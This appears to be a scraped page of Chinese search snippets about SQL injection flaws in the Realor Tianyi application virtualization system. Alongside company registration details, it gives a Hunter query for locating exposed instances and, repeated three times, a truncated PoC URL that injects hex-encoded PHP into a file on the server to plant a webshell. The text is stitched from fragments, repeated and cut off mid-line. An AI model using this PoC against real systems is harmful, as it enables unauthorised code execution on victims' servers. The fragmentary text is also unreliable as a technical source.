谢谢!一、漏洞简述瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基...查看全文 相关企业信息 公司名称:西安瑞友信息技术资讯有限公司 法人代表:方浩 注册资本:1000万人民币 成立时间:1999-05-07 公司类型:有限责任公司(自然人投资或控股) 经营状态:开业 注册地址: 陕西省西安市高新...
瑞友天翼应用虚拟化系统 ConsoleExternalApi.XGI页面user参数 存在SQL注入漏洞,可以写入webshell,导致getshell ''' # 漏洞简要描述 samples = [''] # 测试样列,就是用 PoC 测试成功的网站 install_requires = [''] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写 ...
瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码,(该漏洞是通过[SQL注入](https://so.csdn.net/so/search?q=SQL注入&spm=1001.2101.3001.7020)写入后门文件进行代码执行) ##影响范围 5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1 ...
## 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞 ## hunter ``` app.name="REALOR 瑞友天翼虚拟化平台" ``` ## poc ``` http://xx.xx.xx.xx/hmrao.php?s=/Admin/appsave&appid=1%27);select%200x3c3f70687020706870696e666f28293b3f3e%20into%20outfile%20%27C:\Program%20Files%20(x86)\...
## 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞 ## hunter ``` app.name="REALOR 瑞友天翼虚拟化平台" ``` ## poc ``` http://xx.xx.xx.xx/hmrao.php?s=/Admin/appsave&appid=1%27);select%200x3c3f70687020706870696e666f28293b3f3e%20into%20outfile%20%27C:\Program%20Files%20(x86)\...
## 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞 ## hunter ``` app.name="REALOR 瑞友天翼虚拟化平台" ``` ## poc ``` http://xx.xx.xx.xx/hmrao.php?s=/Admin/appsave&appid=1%27);select%200x3c3f70687020706870696e666f28293b3f3e%20into%20outfile%20%27C:\Program%20Files%20(x86)\...